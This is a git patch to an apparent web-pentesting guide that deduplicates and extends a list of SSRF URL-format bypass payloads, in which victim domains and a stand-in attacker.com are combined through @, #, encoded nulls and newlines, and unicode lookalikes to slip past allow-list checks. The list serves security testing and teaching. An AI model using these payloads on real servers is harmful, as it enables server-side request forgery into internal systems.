From a3d91ce3626b5660d55a04503a365f01e6a81e62 Mon Sep 17 00:00:00 2001
From: Eferus <11998540+Eferus@users.noreply.github.com>
Date: Sat, 6 May 2023 04:28:16 +0200
Subject: [PATCH] Reorganize Domain Confusion list in SSRF

* Remove duplicates
* Add payloads
---
 .../url-format-bypass.md                      | 24 +++++++------------
 1 file changed, 8 insertions(+), 16 deletions(-)

diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index b7949bb2..2382edfe 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -120,26 +120,17 @@ attacker。com
 
 ```bash
 # Try also to change attacker.com for 127.0.0.1 to try to access localhost
-http://{domain}@attacker.com
-http://{domain}%6D@attacker.com
-https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
-http://attacker.com#{domain}
-http://{domain}.attacker.com
-http://attacker.com/{domain}
-http://attacker.com/?d={domain}
+# Try replacing https by http
+# Try URL-encoded characters
 https://{domain}@attacker.com
-https://attacker.com#{domain}
 https://{domain}.attacker.com
+https://{domain}%6D@attacker.com
 https://attacker.com/{domain}
 https://attacker.com/?d={domain}
-http://{domain}@attacker.com
-http://attacker.com#{domain}
-http://{domain}.attacker.com
-http://attacker.com/{domain}
-http://attacker.com/?d={domain}
-http://attacker.com%00{domain}
-http://attacker.com?{domain}
-http://attacker.com///{domain}
+https://attacker.com#{domain}
+https://attacker.com@{domain}
+https://attacker.com#@{domain}
+https://attacker.com%23@{domain}
 https://attacker.com%00{domain}
 https://attacker.com%0A{domain}
 https://attacker.com?{domain}
@@ -153,6 +144,7 @@ https://attacker.com\@@{domain}
 https://attacker.com:\@@{domain}
 https://attacker.com#\@{domain}
 https://attacker.com\anything@{domain}/
+https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
 
 # On each IP position try to put 1 attackers domain and the others the victim domain
 http://1.1.1.1 &@2.2.2.2# @3.3.3.3/